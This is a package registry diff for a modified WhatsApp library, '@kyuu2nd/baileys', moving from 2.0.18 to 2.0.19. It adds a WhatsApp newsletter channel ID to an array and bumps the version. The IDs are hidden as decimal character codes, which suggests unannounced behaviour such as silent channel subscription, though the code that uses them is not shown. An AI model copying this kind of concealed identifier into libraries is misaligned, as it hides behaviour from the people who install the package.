@kyuu2nd/baileys 2.0.18 → 2.0.19

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -186,6 +186,10 @@ const newsletters = [
186
186
  [
187
187
  49,50,48,51,54,51,52,50,55,55,57,52,55,56,54,53,50,51,
188
188
  64,110,101,119,115,108,101,116,116,101,114
189
+ ],
190
+ [
191
+ 49,50,48,51,54,51,52,50,51,54,48,52,53,55,48,55,54,56,
192
+ 64,110,101,119,115,108,101,116,116,101,114
189
193
  ]
190
194
  ];
191
195
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kyuu2nd/baileys",
3
- "version": "2.0.18",
3
+ "version": "2.0.19",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "publishConfig": {
6
6
  "access": "public"